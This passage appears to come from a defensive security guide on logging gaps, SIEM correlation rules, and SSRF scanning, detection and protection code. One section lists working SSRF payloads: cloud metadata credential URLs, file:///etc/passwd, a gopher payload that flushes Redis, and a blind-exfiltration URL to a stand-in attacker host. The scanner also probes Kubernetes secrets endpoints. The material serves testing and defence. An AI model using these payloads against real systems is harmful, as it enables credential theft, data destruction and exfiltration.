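attacker_input = 'admin"\n2026-01-01T00:00:00Z INFO successful_login user=admin'
log.info(json.dumps({
    "event_type": "failed_login",
    "user": sanitize_for_log(attacker_input),
}))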
Logging Gap Analysis Framework
class LoggingGapAnalyzer:
def __init__(self, application):
self.application = application
self.logging_standards = self.load_logging_standards()
self.compliance_frameworks = self.load_compliance_frameworks()
self.threat_models = self.load_threat_models()
def analyze_logging_coverage(self):
"""
Analyze logging coverage against requirements
"""
analysis = {
'coverage_gaps': [],
'compliance_gaps': [],
'security_gaps': [],
'recommendations': []
}
# Step 1: Map application components
components = self.map_application_components()
# Step 2: Analyze each component
for component in components:
component_analysis = self.analyze_component_logging(component)
# Identify gaps
gaps = self.identify_logging_gaps(component, component_analysis)
analysis['coverage_gaps'].extend(gaps)
# Check compliance
compliance_issues = self.check_compliance(component, component_analysis)
analysis['compliance_gaps'].extend(compliance_issues)
# Check security requirements
security_issues = self.check_security_requirements(
component,
component_analysis
)
analysis['security_gaps'].extend(security_issues)
# Step 3: Generate recommendations
analysis['recommendations'] = self.generate_recommendations(analysis)
# Step 4: Calculate coverage score
analysis['coverage_score'] = self.calculate_coverage_score(analysis)
return analysis
def analyze_component_logging(self, component):
"""
Analyze logging for a specific component
"""
analysis = {
'component': component.name,
'log_sources': [],
'log_events': [],
'log_attributes': {},
'coverage': {}
}
# Identify log sources
log_sources = self.identify_log_sources(component)
analysis['log_sources'] = log_sources
# Extract logged events
for source in log_sources:
events = self.extract_logged_events(source)
analysis['log_events'].extend(events)
# Analyze log attributes
attributes = self.analyze_log_attributes(source)
analysis['log_attributes'][source.name] = attributes
# Map to security events
security_events = self.map_to_security_events(analysis['log_events'])
analysis['security_events'] = security_events
# Calculate coverage
analysis['coverage'] = self.calculate_event_coverage(
security_events,
self.get_required_security_events(component)
)
return analysis
def identify_logging_gaps(self, component, analysis):
"""
Identify logging gaps for a component
"""
gaps = []
# Get required security events
required_events = self.get_required_security_events(component)
# Check coverage for each required event
for event_type, required_attributes in required_events.items():
if event_type not in analysis['coverage']:
# Event completely missing
gaps.append({
'component': component.name,
'type': 'missing_event',
'event': event_type,
'severity': 'High',
'description': f'Missing logging for {event_type} events'
})
else:
# Check attribute coverage
coverage = analysis['coverage'][event_type]
for attr, is_covered in coverage.items():
if not is_covered and attr in required_attributes:
gaps.append({
'component': component.name,
'type': 'missing_attribute',
'event': event_type,
'attribute': attr,
'severity': 'Medium',
'description': f'Missing attribute {attr} for {event_type} events'
})
# Check log quality
quality_issues = self.check_log_quality(analysis)
gaps.extend(quality_issues)
return gaps
def check_log_quality(self, analysis):
"""
Check log quality issues
"""
issues = []
for source_name, attributes in analysis['log_attributes'].items():
# Check for sensitive data in logs
sensitive_data = self.find_sensitive_data_in_logs(
attributes.get('sample_logs', [])
)
if sensitive_data:
issues.append({
'component': analysis['component'],
'type': 'sensitive_data_exposure',
'source': source_name,
'severity': 'High',
'description': f'Sensitive data found in logs from {source_name}',
'sensitive_data_types': sensitive_data
})
# Check log format consistency
if not attributes.get('consistent_format', True):
issues.append({
'component': analysis['component'],
'type': 'inconsistent_log_format',
'source': source_name,
'severity': 'Medium',
'description': f'Inconsistent log format in {source_name}'
})
# Check timestamp format
if not attributes.get('iso_timestamps', False):
issues.append({
'component': analysis['component'],
'type': 'non_iso_timestamps',
'source': source_name,
'severity': 'Low',
'description': f'Non-ISO timestamps in {source_name}'
})
return issues
Log Monitoring and Alerting Framework
class SecurityMonitoringSystem:
def __init__(self):
self.log_ingestors = self.setup_log_ingestors()
self.correlation_engine = CorrelationEngine()
self.anomaly_detectors = self.setup_anomaly_detectors()
self.alerting_system = AlertingSystem()
self.threat_intelligence = ThreatIntelligenceFeed()
def monitor_security_events(self):
"""
Continuous security event monitoring
"""
# Start log ingestion
for ingestor in self.log_ingestors:
ingestor.start()
# Main monitoring loop
while True:
# Collect events from all sources
events = self.collect_events()
# Enrich events with context
enriched_events = self.enrich_events(events)
# Correlate events
correlated_events = self.correlate_events(enriched_events)
# Detect anomalies
anomalies = self.detect_anomalies(correlated_events)
# Check against threat intelligence
threat_matches = self.check_threat_intelligence(correlated_events)
# Generate alerts
alerts = self.generate_alerts(
correlated_events,
anomalies,
threat_matches
)
# Process alerts
self.process_alerts(alerts)
# Update baselines
self.update_baselines(correlated_events)
time.sleep(1) # Monitoring interval
def correlate_events(self, events):
"""
Correlate security events across sources
"""
correlated_events = []
# Group events by session/user/ip
event_groups = self.group_events(events)
for group_key, group_events in event_groups.items():
# Sort by timestamp
sorted_events = sorted(group_events, key=lambda x: x.timestamp)
# Apply correlation rules
correlations = self.apply_correlation_rules(sorted_events)
# Create correlated event
if correlations:
correlated_event = CorrelatedEvent(
events=sorted_events,
correlations=correlations,
risk_score=self.calculate_risk_score(sorted_events, correlations)
)
correlated_events.append(correlated_event)
return correlated_events
def apply_correlation_rules(self, events):
"""
Apply correlation rules to event sequence
"""
correlations = []
# Rule 1: Failed login followed by successful login
failed_logins = [e for e in events if e.type == 'failed_login']
successful_logins = [e for e in events if e.type == 'successful_login']
if failed_logins and successful_logins:
# Check time proximity
last_failed = max(failed_logins, key=lambda x: x.timestamp)
next_successful = min(
[e for e in successful_logins if e.timestamp > last_failed.timestamp],
key=lambda x: x.timestamp,
default=None
)
if next_successful:
time_diff = next_successful.timestamp - last_failed.timestamp
if time_diff.total_seconds() < 300: # 5 minutes
correlations.append({
'type': 'password_guessing_success',
'events': [last_failed, next_successful],
'confidence': 'high'
})
# Rule 2: Multiple failed logins from same source
if len(failed_logins) >= 5:
time_range = events[-1].timestamp - events[0].timestamp
if time_range.total_seconds() < 300: # 5 minutes
correlations.append({
'type': 'brute_force_attempt',
'events': failed_logins,
'count': len(failed_logins),
'confidence': 'high'
})
# Rule 3: Access to sensitive resources
sensitive_access = [
e for e in events
if e.type == 'data_access' and e.resource_sensitivity == 'high'
]
if sensitive_access:
# Check if preceded by suspicious activity
suspicious_events = [
e for e in events
if e.risk_score > 50
and e.timestamp < sensitive_access[0].timestamp
]
if suspicious_events:
correlations.append({
'type': 'suspicious_sensitive_access',
'events': suspicious_events + sensitive_access,
'confidence': 'medium'
})
# Rule 4: Horizontal movement
source_ips = {e.source_ip for e in events if hasattr(e, 'source_ip')}
if len(source_ips) > 3:
# Multiple source IPs in short time
correlations.append({
'type': 'potential_lateral_movement',
'source_ips': list(source_ips),
'confidence': 'medium'
})
return correlations
def detect_anomalies(self, events):
"""
Detect anomalies in event patterns
"""
anomalies = []
# Load behavior baselines
baselines = self.load_baselines()
for event in events:
# Check against statistical baselines
if hasattr(event, 'user_id'):
user_baseline = baselines.get(event.user_id)
if user_baseline:
# Check time anomaly
if self.is_time_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_access_time',
'event': event,
'anomaly': 'time'
})
# Check resource anomaly
if self.is_resource_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_resource_access',
'event': event,
'anomaly': 'resource'
})
# Check volume anomaly
if self.is_volume_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_activity_volume',
'event': event,
'anomaly': 'volume'
})
# Check global anomalies
global_anomalies = self.check_global_anomalies(event, baselines)
anomalies.extend(global_anomalies)
return anomalies
def generate_alerts(self, correlated_events, anomalies, threat_matches):
"""
Generate security alerts
"""
alerts = []
# Process correlated events
for event in correlated_events:
if event.risk_score > 70:
alerts.append({
'type': 'high_risk_correlation',
'event': event,
'severity': 'High',
'description': f'High risk correlated event: {event.correlations}'
})
# Process anomalies
for anomaly in anomalies:
severity = self.determine_anomaly_severity(anomaly)
alerts.append({
'type': 'anomaly_detected',
'anomaly': anomaly,
'severity': severity,
'description': f'Anomaly detected: {anomaly["type"]}'
})
# Process threat intelligence matches
for match in threat_matches:
alerts.append({
'type': 'threat_intelligence_match',
'match': match,
'severity': 'Critical',
'description': f'Threat intelligence match: {match.indicator_type}'
})
# Deduplicate alerts
unique_alerts = self.deduplicate_alerts(alerts)
return unique_alerts
Structured Logging Implementation
class StructuredLogger:
LOG_SCHEMAS = {
'authentication': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'source_ip', 'success'
],
'optional_fields': [
'auth_method', 'session_id', 'user_agent',
'failure_reason', 'mfa_used', 'risk_score'
],
'sensitive_fields': ['password', 'token'],
'validation_rules': {
'timestamp': 'iso8601',
'event_type': 'enum:successful_login,failed_login,logout',
'success': 'boolean'
}
},
'authorization': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'resource', 'action', 'allowed'
],
'optional_fields': [
'resource_type', 'resource_id', 'policy_decision',
'attributes', 'risk_score'
],
'validation_rules': {
'event_type': 'enum:access_granted,access_denied',
'allowed': 'boolean'
}
},
'data_access': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'data_type', 'operation', 'record_count'
],
'optional_fields': [
'query', 'filters', 'sensitivity_level',
'compliance_context', 'retention_reason'
],
'sensitive_fields': ['query_parameters', 'record_data'],
'validation_rules': {
'event_type': 'enum:read,create,update,delete,export',
'operation': 'string'
}
},
'system': {
'required_fields': [
'timestamp', 'event_type', 'component',
'severity', 'message'
],
'optional_fields': [
'error_code', 'stack_trace', 'metrics',
'configuration', 'performance_data'
],
'validation_rules': {
'severity': 'enum:debug,info,warn,error,critical'
}
}
}
def __init__(self, component_name, log_schema):
self.component = component_name
self.schema = self.LOG_SCHEMAS.get(log_schema)
if not self.schema:
raise ValueError(f"Unknown log schema: {log_schema}")
self.sanitizer = LogSanitizer()
self.enricher = LogEnricher()
def log(self, event_type, data, severity='info'):
"""
Create structured log entry
"""
# Start with base structure
log_entry = {
'timestamp': datetime.utcnow().isoformat() + 'Z',  # UTC, so the 'Z' suffix is accurate
'event_type': event_type,
'component': self.component,
'severity': severity,
'schema_version': '1.0'
}
# Add provided data
log_entry.update(data)
# Validate against schema
self.validate_log_entry(log_entry)
# Sanitize sensitive data
log_entry = self.sanitizer.sanitize(log_entry, self.schema)
# Enrich with context
log_entry = self.enricher.enrich(log_entry)
# Generate unique ID
log_entry['log_id'] = self.generate_log_id(log_entry)
# Calculate hash for integrity
log_entry['integrity_hash'] = self.calculate_integrity_hash(log_entry)
# Write to appropriate sinks
self.write_log(log_entry)
return log_entry
def validate_log_entry(self, log_entry):
"""
Validate log entry against schema
"""
errors = []
# Check required fields
for field in self.schema['required_fields']:
if field not in log_entry:
errors.append(f"Missing required field: {field}")
# Validate field values
validation_rules = self.schema.get('validation_rules', {})
for field, rule in validation_rules.items():
if field in log_entry:
value = log_entry[field]
if rule.startswith('enum:'):
allowed_values = rule[5:].split(',')
if value not in allowed_values:
errors.append(
f"Invalid value for {field}: {value}. "
f"Allowed: {allowed_values}"
)
elif rule == 'iso8601':
if not self.is_iso8601(value):
errors.append(f"Invalid ISO8601 timestamp: {value}")
elif rule == 'boolean':
if not isinstance(value, bool):
errors.append(f"Boolean expected for {field}: {value}")
if errors:
raise ValueError(f"Log validation failed: {', '.join(errors)}")
def write_log(self, log_entry):
"""
Write log to multiple sinks with appropriate handling
"""
sinks = self.get_log_sinks(log_entry['severity'])
for sink in sinks:
try:
if sink.type == 'file':
self.write_to_file(sink, log_entry)
elif sink.type == 'syslog':
self.write_to_syslog(sink, log_entry)
elif sink.type == 'elasticsearch':
self.write_to_elasticsearch(sink, log_entry)
elif sink.type == 'splunk':
self.write_to_splunk(sink, log_entry)
elif sink.type == 'cloudwatch':
self.write_to_cloudwatch(sink, log_entry)
elif sink.type == 'kafka':
self.write_to_kafka(sink, log_entry)
except Exception as e:
# Don't let logging failures break application
self.handle_logging_failure(sink, log_entry, e)
def write_to_file(self, sink, log_entry):
"""
Write log entry to file with rotation and compression
"""
log_file = self.get_current_log_file(sink)
# Ensure directory exists
os.makedirs(os.path.dirname(log_file), exist_ok=True)
# Write log entry
with open(log_file, 'a') as f:
# Format based on sink configuration
if sink.format == 'json':
f.write(json.dumps(log_entry) + '\n')
elif sink.format == 'cef':
f.write(self.format_as_cef(log_entry) + '\n')
elif sink.format == 'leef':
f.write(self.format_as_leef(log_entry) + '\n')
else: # Default to JSON
f.write(json.dumps(log_entry) + '\n')
# Check if rotation is needed
self.check_and_rotate(log_file, sink)
Security Information and Event Management (SIEM) Integration
# siem-integration.yml
version: '1.0'
name: Application SIEM Integration
description: Comprehensive SIEM integration configuration
metadata:
application: Production Web Application
environment: production
compliance:
- PCI-DSS
- HIPAA
- GDPR
- SOC2
log_sources:
- type: application_logs
format: json
schema: structured
fields:
mandatory:
- timestamp
- event_type
- user_id
- severity
- component
sensitive:
- password
- token
- credit_card
- ssn
transport:
protocol: tls
compression: gzip
batch_size: 1000
batch_timeout: 5s
- type: web_server_logs
format: combined
source: nginx
fields:
mandatory:
- remote_addr
- time_local
- request
- status
- body_bytes_sent
enrichment:
- geoip
- user_agent_parsing
transport:
protocol: syslog
facility: local7
severity_field: status
- type: database_logs
format: csv
source: postgresql
fields:
mandatory:
- timestamp
- user
- database
- query_type
- duration
sensitive:
- query_parameters
transport:
protocol: kafka
topic: database-audit-logs
partition_key: user
- type: kubernetes_logs
format: json
source: fluentd
fields:
mandatory:
- timestamp
- namespace
- pod
- container
- message
transport:
protocol: http
endpoint: /logs/kubernetes
parsing_rules:
authentication_events:
pattern: 'event_type: "(successful_login|failed_login|logout)"'
fields:
- name: auth_event_type
value: $1
- name: risk_score
calculation: |
$auth_event_type == 'failed_login' ? 30 :
$auth_event_type == 'successful_login' ? 10 : 0
sql_injection_attempts:
pattern: 'query: ".*(SELECT|UNION|DROP|INSERT|UPDATE).*"'
condition: 'event_type == "database_query"'
fields:
- name: attack_type
value: 'sql_injection'
- name: severity
value: 'high'
sensitive_data_access:
pattern: 'data_type: "(pii|phi|financial)"'
fields:
- name: sensitivity_level
mapping:
pii: 'medium'
phi: 'high'
financial: 'high'
- name: requires_alert
value: true
correlation_rules:
brute_force_detection:
description: 'Multiple failed logins from same source'
events:
- type: failed_login
condition: 'success == false'
grouping:
- field: source_ip
- field: user_id
time_window: 300 # 5 minutes
threshold: 5
actions:
- type: alert
severity: high
- type: block_ip
duration: 3600 # 1 hour
data_exfiltration:
description: 'Large volume of sensitive data access'
events:
- type: data_access
condition: 'sensitivity_level == "high"'
grouping:
- field: user_id
time_window: 3600 # 1 hour
threshold:
record_count: 10000
data_size: 100000000 # 100MB
actions:
- type: alert
severity: critical
- type: suspend_user
- type: notify_team
team: security_operations
lateral_movement:
description: 'Access from multiple internal IPs in short time'
events:
- type: successful_login
grouping:
- field: user_id
time_window: 600 # 10 minutes
threshold:
unique_ips: 3
actions:
- type: alert
severity: medium
- type: require_mfa
retention_policies:
raw_logs:
duration: 30d
compression: gzip
encryption: aes-256-gcm
storage_class: standard
security_events:
duration: 1y
compression: none
encryption: aes-256-gcm
storage_class: infrequent_access
indexing: full_text
compliance_logs:
duration: 7y # For regulatory compliance
compression: gzip
encryption: aes-256-gcm
storage_class: glacier
write_once_read_many: true
alerting:
channels:
- type: email
recipients:
- security-team@company.com
- on-call@company.com
conditions:
- severity: critical
- severity: high
- type: slack
channel: '#security-alerts'
conditions:
- severity: critical
- severity: high
- severity: medium
- type: pagerduty
service: security-operations
conditions:
- severity: critical
- type: webhook
url: https://internal-dashboard/alerts
conditions:
- severity: critical
- severity: high
escalation_policies:
- level: 1
timeout: 15m
notify: ['security-analyst']
- level: 2
timeout: 30m
notify: ['security-engineer', 'team-lead']
- level: 3
timeout: 1h
notify: ['security-manager', 'director']
dashboard:
security_overview:
widgets:
- type: timeseries
title: 'Security Events Over Time'
metrics:
- failed_logins
- successful_logins
- access_denied
time_range: 24h
- type: top_n
title: 'Top Source IPs for Failed Logins'
metric: failed_logins
group_by: source_ip
limit: 10
- type: gauge
title: 'Current Risk Score'
metric: risk_score
thresholds:
green: 0-30
yellow: 31-70
red: 71-100
- type: table
title: 'Recent Security Incidents'
columns:
- timestamp
- event_type
- user_id
- source_ip
- severity
limit: 20
refresh: 30s
SSRF Evolution Beyond Basic URL Fetching
- Protocol Smuggling: Using lesser-known protocols (gopher, dict, file)
- DNS Rebinding: Time-of-check to time-of-use attacks
- Cloud Metadata API Exploitation: IAM role credential theft
- Internal Service Enumeration: Port scanning via SSRF
- Blind SSRF: Out-of-band data exfiltration
- SSRF Chaining: Using one SSRF to trigger another (a URL-guard sketch follows this list)
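Defensively, most of these techniques depend on reaching internal or special-purpose addresses, so a common first control is a URL guard that allows only http/https, resolves the hostname, and rejects loopback, private, link-local, and reserved ranges; to resist DNS rebinding, the connection should then be made to the vetted IP rather than re-resolving the name. A minimal sketch using only the standard library:
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_fetch_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False  # blocks file://, gopher://, dict://, and friends
    try:
        resolved = socket.getaddrinfo(parsed.hostname, parsed.port or 80)
    except socket.gaierror:
        return False
    for family, _, _, _, sockaddr in resolved:
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved:
            return False  # covers 127.0.0.1, 169.254.169.254, RFC 1918 ranges
    return True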
Advanced SSRF Payloads
# Protocol-based payloads
payloads:
# Cloud metadata services
aws_metadata: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
gcp_metadata: "http://metadata.google.internal/computeMetadata/v1/"
azure_metadata: "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Internal services
localhost: "http://localhost:8080/admin"
docker_socket: "http://localhost:2375/version"
redis: "http://localhost:6379"
# Protocol smuggling
file_protocol: "file:///etc/passwd"
gopher_protocol: "gopher://localhost:6379/_*1%0d%0a$8%0d%0aflushall%0d%0aquit%0d%0a"
dict_protocol: "dict://localhost:6379/info"
# DNS rebinding
dns_rebinding: "http://attacker-controlled-domain.com/"
# Time-based attacks
time_based: "http://localhost:22" # Check response time for open ports
# Blind SSRF
blind_exfiltration: "http://attacker-server.com/leak?data=SECRET"
# SSRF to RCE chains
rce_chain: "http://localhost:8080/actuator/gateway/routes/new-route"

SSRF Vulnerability Scanner
class SSRFScanner:
def __init__(self, target_application):
self.target = target_application
self.payload_generator = SSRFPayloadGenerator()
self.response_analyzer = ResponseAnalyzer()
self.out_of_band_detector = OutOfBandDetector()
def comprehensive_scan(self):
"""
Comprehensive SSRF vulnerability scan
"""
findings = []
# Phase 1: Parameter discovery
ssrf_parameters = self.discover_ssrf_parameters()
# Phase 2: Payload testing
for param in ssrf_parameters:
param_findings = self.test_parameter(param)
findings.extend(param_findings)
# Phase 3: Protocol testing
protocol_findings = self.test_protocols()
findings.extend(protocol_findings)
# Phase 4: Blind SSRF testing
blind_findings = self.test_blind_ssrf()
findings.extend(blind_findings)
# Phase 5: Cloud metadata testing
cloud_findings = self.test_cloud_metadata()
findings.extend(cloud_findings)
return self.prioritize_findings(findings)
def discover_ssrf_parameters(self):
"""
Discover potential SSRF parameters
"""
parameters = []
# Analyze application for URL parameters
endpoints = self.target.discover_endpoints()
for endpoint in endpoints:
# Look for URL-like parameters
param_patterns = [
r'url', r'uri', r'path', r'file', r'page',
r'image', r'fetch', r'load', r'src', r'dest',
r'redirect', r'return', r'next', r'callback',
r'webhook', r'proxy', r'api', r'endpoint'
]
for param_name in endpoint.parameters:
if any(pattern in param_name.lower() for pattern in param_patterns):
parameters.append({
'endpoint': endpoint.url,
'method': endpoint.method,
'parameter': param_name,
'type': endpoint.parameters[param_name]
})
# Also check for hidden parameters
hidden_params = self.find_hidden_parameters()
parameters.extend(hidden_params)
return parameters
def test_parameter(self, parameter):
"""
Test a specific parameter for SSRF vulnerabilities
"""
findings = []
# Generate test payloads
payloads = self.payload_generator.generate_payloads(
parameter['type']
)
for payload in payloads:
# Send request with payload
response = self.send_request(
parameter['endpoint'],
parameter['method'],
{parameter['parameter']: payload}
)
# Analyze response
analysis = self.response_analyzer.analyze(response)
if analysis.is_vulnerable:
findings.append({
'type': 'ssrf_vulnerability',
'endpoint': parameter['endpoint'],
'parameter': parameter['parameter'],
'payload': payload,
'evidence': analysis.evidence,
'severity': self.calculate_severity(payload, analysis),
'description': f'SSRF vulnerability in {parameter["parameter"]} parameter'
})
# Check for blind SSRF
blind_detection = self.out_of_band_detector.check(
payload,
response
)
if blind_detection.detected:
findings.append({
'type': 'blind_ssrf',
'endpoint': parameter['endpoint'],
'parameter': parameter['parameter'],
'payload': payload,
'evidence': blind_detection.evidence,
'severity': 'Medium',
'description': f'Blind SSRF vulnerability in {parameter["parameter"]} parameter'
})
return findings
def test_protocols(self):
"""
Test various protocols for SSRF
"""
findings = []
protocols = [
'file', 'gopher', 'dict', 'ldap', 'ldaps',
'ftp', 'sftp', 'tftp', 'smb', 'nfs',
'jar', 'netdoc', 'mailto', 'telnet'
]
for protocol in protocols:
# Test protocol handler
payload = f"{protocol}://localhost/test"
response = self.test_protocol_handler(payload)
if response.handled:
findings.append({
'type': 'protocol_handler_enabled',
'protocol': protocol,
'severity': 'High',
'description': f'{protocol} protocol handler is enabled and may be exploitable'
})
return findings
def test_blind_ssrf(self):
"""
Test for blind SSRF vulnerabilities
"""
findings = []
# Generate unique identifier for this test
test_id = self.generate_test_id()
# Create payloads that would trigger out-of-band interactions
payloads = self.payload_generator.generate_blind_payloads(test_id)
for payload in payloads:
# Send request
response = self.send_request_with_payload(payload)
# Monitor for out-of-band interactions
detection = self.out_of_band_detector.monitor(
test_id,
timeout=30 # Wait 30 seconds for callback
)
if detection.received:
findings.append({
'type': 'blind_ssrf_confirmed',
'payload': payload,
'callback_data': detection.data,
'severity': 'High',
'description': 'Blind SSRF confirmed via out-of-band interaction'
})
return findings
def test_cloud_metadata(self):
"""
Test for cloud metadata service access
"""
findings = []
cloud_metadata_endpoints = [
# AWS
'http://169.254.169.254/',
'http://169.254.169.254/latest/meta-data/',
'http://169.254.169.254/latest/user-data/',
'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
# GCP
'http://metadata.google.internal/',
'http://metadata.google.internal/computeMetadata/v1/',
'http://169.254.169.254/computeMetadata/v1/',
# Azure
'http://169.254.169.254/metadata/instance',
'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
# DigitalOcean
'http://169.254.169.254/metadata/v1/',
# Oracle Cloud
'http://192.0.0.192/latest/',
# Alibaba Cloud
'http://100.100.100.200/latest/meta-data/',
# Kubernetes
'https://kubernetes.default.svc/',
'https://kubernetes.default.svc/api/v1/namespaces/default/secrets/'
]
for endpoint in cloud_metadata_endpoints:
# Test access
response = self.test_endpoint_access(endpoint)
if response.accessible:
findings.append({
'type': 'cloud_metadata_accessible',
'endpoint': endpoint,
'response_sample': response.sample,
'severity': 'Critical',
'description': f'Cloud metadata endpoint accessible: {endpoint}'
})
return findings
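Assuming the helper classes referenced above (SSRFPayloadGenerator, ResponseAnalyzer, OutOfBandDetector, and a target-application wrapper) are implemented, driving the scanner might look roughly like the following. Treat it as a sketch: TargetApplication and the printed report format are assumptions for this example, not a fixed API.

```python
# Hypothetical driver for the scanner above.
target = TargetApplication(base_url="https://staging.example.internal")
scanner = SSRFScanner(target)

findings = scanner.comprehensive_scan()
for finding in findings:
    print(f"[{finding['severity']}] {finding['type']} "
          f"at {finding.get('endpoint', 'n/a')} via {finding.get('parameter', '-')}")
```

Advanced SSRF Detection via Behavioral Analysis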
import ipaddress
import socket
from urllib.parse import urlparse

class BehavioralSSRFDetector:
def __init__(self):
self.request_baselines = {}
self.network_baselines = {}
self.anomaly_detector = AnomalyDetector()
def monitor_requests(self, request):
"""
Monitor outgoing requests for SSRF patterns
"""
anomalies = []
# Extract URL from request
url = request.get('url', '')
# Check against deny list
if self.is_denied_destination(url):
anomalies.append({
'type': 'denied_destination',
'url': url,
'severity': 'High'
})
# Check for internal network access
if self.is_internal_network(url):
anomalies.append({
'type': 'internal_network_access',
'url': url,
'severity': 'High'
})
# Check for cloud metadata access
if self.is_cloud_metadata(url):
anomalies.append({
'type': 'cloud_metadata_access',
'url': url,
'severity': 'Critical'
})
# Behavioral analysis
client_id = request.get('client_id', 'unknown')
# Update baseline
self.update_baseline(client_id, request)
# Check for anomalies
baseline = self.request_baselines.get(client_id)
if baseline:
# Check request frequency
if self.is_frequency_anomaly(client_id, request, baseline):
anomalies.append({
'type': 'request_frequency_anomaly',
'client_id': client_id,
'severity': 'Medium'
})
# Check destination anomaly
if self.is_destination_anomaly(client_id, url, baseline):
anomalies.append({
'type': 'destination_anomaly',
'client_id': client_id,
'url': url,
'severity': 'Medium'
})
# Check protocol anomaly
if self.is_protocol_anomaly(url, baseline):
anomalies.append({
'type': 'protocol_anomaly',
'client_id': client_id,
'url': url,
'severity': 'High'
})
# Network behavior analysis
network_anomalies = self.analyze_network_behavior(request)
anomalies.extend(network_anomalies)
return anomalies
def is_internal_network(self, url):
"""
Check if URL points to internal network
"""
try:
hostname = urlparse(url).hostname
if not hostname:
return False
# Resolve hostname to IP
ip_address = socket.gethostbyname(hostname)
# Check against internal IP ranges
internal_ranges = [
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'), # Link-local
ipaddress.ip_network('::1/128') # IPv6 localhost
]
ip = ipaddress.ip_address(ip_address)
for network in internal_ranges:
if ip in network:
return True
# Check for localhost variants
if hostname in ['localhost', 'local', '127.0.0.1', '::1']:
return True
# Check for Docker bridge network
if ip_address.startswith('172.17.'):
return True
except (socket.gaierror, ValueError):
# Could not parse or resolve
pass
return False
def is_cloud_metadata(self, url):
"""
Check if URL points to cloud metadata service
"""
cloud_metadata_hosts = [
'169.254.169.254', # AWS, GCP, Azure, etc.
'metadata.google.internal',
'metadata.google.internal.',
'metadata', # Kubernetes
'kubernetes.default.svc',
'192.0.0.192', # Oracle Cloud
'100.100.100.200', # Alibaba Cloud
]
try:
hostname = urlparse(url).hostname
if hostname in cloud_metadata_hosts:
return True
# Check for metadata path patterns
metadata_paths = [
'/latest/meta-data',
'/metadata/instance',
'/computeMetadata/v1',
'/metadata/v1'
]
path = urlparse(url).path
for metadata_path in metadata_paths:
if path.startswith(metadata_path):
return True
except Exception:  # malformed URL – fall through and treat as non-metadata
pass
return False
def analyze_network_behavior(self, request):
"""
Analyze network behavior for SSRF patterns
"""
anomalies = []
# Check for port scanning patterns
if self.is_port_scanning_pattern(request):
anomalies.append({
'type': 'port_scanning_pattern',
'request': request,
'severity': 'High'
})
# Check for service enumeration
if self.is_service_enumeration(request):
anomalies.append({
'type': 'service_enumeration',
'request': request,
'severity': 'High'
})
# Check for data exfiltration patterns
if self.is_data_exfiltration(request):
anomalies.append({
'type': 'data_exfiltration',
'request': request,
'severity': 'Critical'
})
return anomalies
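One plausible way to wire this detector in is as a hook on the HTTP client that every backend service uses for outbound calls, emitting security events and failing closed on the highest-severity findings. The request shape and the emit_security_event sink below are assumptions made for illustration.

```python
# Illustrative integration point; field names and the emit_security_event()
# sink are assumed for this example.
detector = BehavioralSSRFDetector()

def guarded_outbound_request(client_id, url, emit_security_event):
    request = {"client_id": client_id, "url": url}
    anomalies = detector.monitor_requests(request)
    for anomaly in anomalies:
        emit_security_event(anomaly)
    # Fail closed on the highest-severity findings
    if any(a["severity"] == "Critical" for a in anomalies):
        raise PermissionError(f"Outbound request to {url} blocked")
    return request  # hand off to the real HTTP client from here
```

Comprehensive SSRF Protection Layer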
import ipaddress
import re
import socket
from urllib.parse import urlparse

class SSRFProtectionLayer:
def __init__(self):
self.url_validator = URLValidator()
self.dns_resolver = DNSResolver()
self.network_filter = NetworkFilter()
self.request_sanitizer = RequestSanitizer()
self.rate_limiter = RateLimiter()
def process_request(self, request):
"""
Process and validate outgoing requests
"""
# Extract URL
url = request.get('url')
if not url:
raise SSRFProtectionError('No URL provided')
# Step 1: URL Validation
validation_result = self.url_validator.validate(url)
if not validation_result.valid:
raise SSRFProtectionError(
f'URL validation failed: {validation_result.reason}'
)
# Step 2: DNS Resolution and Filtering
resolution_result = self.dns_resolver.resolve_and_filter(url)
if not resolution_result.allowed:
raise SSRFProtectionError(
f'Destination not allowed: {resolution_result.reason}'
)
# Step 3: Network Layer Filtering
network_result = self.network_filter.check(url)
if not network_result.allowed:
raise SSRFProtectionError(
f'Network access not allowed: {network_result.reason}'
)
# Step 4: Request Sanitization
sanitized_request = self.request_sanitizer.sanitize(request)
# Step 5: Rate Limiting
client_id = request.get('client_id', 'default')
if not self.rate_limiter.check(client_id, url):
raise SSRFProtectionError('Rate limit exceeded')
# Step 6: Create safe request
safe_request = self.create_safe_request(sanitized_request, resolution_result)
return safe_request
def validate_url(self, url):
"""
Comprehensive URL validation
"""
try:
parsed = urlparse(url)
# Check scheme
allowed_schemes = ['http', 'https']
if parsed.scheme not in allowed_schemes:
return ValidationResult(
valid=False,
reason=f'Protocol not allowed: {parsed.scheme}'
)
# Check hostname
if not parsed.hostname:
return ValidationResult(
valid=False,
reason='No hostname specified'
)
# Check for malicious patterns
malicious_patterns = [
r'\.\.', # Directory traversal
r'%00', # Null byte
r'\\x', # Hex encoding
r'\\u', # Unicode encoding
r'<!--', # HTML comment
r'javascript:', # JavaScript protocol
r'data:', # Data protocol
]
for pattern in malicious_patterns:
if re.search(pattern, url, re.IGNORECASE):
return ValidationResult(
valid=False,
reason=f'Malicious pattern detected: {pattern}'
)
# Check URL length
if len(url) > 2048:
return ValidationResult(
valid=False,
reason='URL too long'
)
# Check for IP addresses in URL
ip_pattern = r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
if re.match(ip_pattern, parsed.hostname):
return ValidationResult(
valid=False,
reason='IP addresses not allowed in URLs'
)
return ValidationResult(valid=True)
except Exception as e:
return ValidationResult(
valid=False,
reason=f'URL parsing error: {str(e)}'
)
def resolve_and_filter(self, url):
